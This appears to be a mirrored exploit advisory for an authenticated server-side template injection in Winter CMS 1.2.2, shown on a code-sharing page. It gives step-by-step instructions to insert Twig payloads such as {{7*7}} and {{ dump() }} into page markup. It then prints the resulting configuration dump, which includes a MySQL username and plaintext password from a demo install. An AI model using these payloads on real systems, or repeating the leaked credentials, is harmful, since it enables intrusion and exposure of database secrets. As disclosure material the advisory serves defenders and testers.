扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 |
# Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated) # Exploit Author: tmrswrr # Date: 12/05/2023 # Vendor: https://wintercms.com/ # Software Link: https://github.com/wintercms/winter/releases/v1.2.2 # Vulnerable Version(s): 1.2.2 #Tested : https://www.softaculous.com/demos/WinterCMS 1 ) Login with admin cred and click CMS > Pages field > Plugin components > https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup 2 ) Write SSTI payload : {{7*7}} 3 ) Save it , Click Priview : https://demos6.demo.com/WinterCMS/demo/plugins 4 ) You will be see result : 49 Payload : {{ dump() }} Result : "*::database" => array:4 [▼ "default" => "mysql" "connections" => array:4 [▼ "sqlite" => array:5 [▼ "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite" "driver" => "sqlite" "foreign_key_constraints" => true "prefix" => "" "url" => null ] "mysql" => array:15 [▼ "charset" => "utf8mb4" "collation" => "utf8mb4_unicode_ci" "database" => "soft_pw3qsny" "driver" => "mysql" "engine" => "InnoDB" "host" => "localhost" "options" => [] "password" => "8QSz9(pT)3" "port" => 3306 "prefix" => "" "prefix_indexes" => true "strict" => true "unix_socket" => "" "url" => null "username" => "soft_pw3qsny" ] "pgsql" => array:12 [▶] "sqlsrv" => array:10 [▶] ] "migrations" => "migrations" "redis" => array:4 [▼ "client" => "phpredis" "options" => array:2 [▼ "cluster" => "redis" "prefix" => "winter_database_" ] "default" => array:5 [▼ "database" => "0" "host" => "127.0.0.1" "password" => null "port" => "6379" "url" => null ] "cache" => array:5 [▼ "database" => "1" "host" => "127.0.0.1" "password" => null "port" => "6379" "url" => null ] ] ] ] |
体验盒子
